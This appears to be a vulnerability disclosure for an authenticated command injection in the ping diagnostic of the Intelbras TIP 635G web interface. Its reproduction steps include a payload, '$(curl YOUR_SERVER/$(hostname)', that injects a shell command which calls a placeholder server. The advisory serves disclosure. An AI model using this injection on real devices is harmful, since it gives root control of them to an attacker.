Description

An authenticated OS command injection vulnerability exists in the web management interface of the Intelbras TIP 635G IP terminal. The diagnostic “ping” functionality improperly sanitizes user-supplied input and passes it directly to a system shell command. An authenticated attacker can inject arbitrary OS commands using shell command substitution (e.g., $(...)), resulting in remote code execution with root privileges. Although command output is not reflected in the web interface, successful exploitation can be confirmed via out-of-band interactions (e.g., network requests initiated by the device). This vulnerability allows full compromise of the affected device and may enable lateral movement within the network.

Version tested

Reproduction Steps

1. Access device IP
2. Login
3. Go to SYSTEM → Tools → PING
4. Use $(curl YOUR_SERVER/$(hostname) and press START and then STOP
5. Observe response on your server logs with the hostname.

Using the id and hostname commands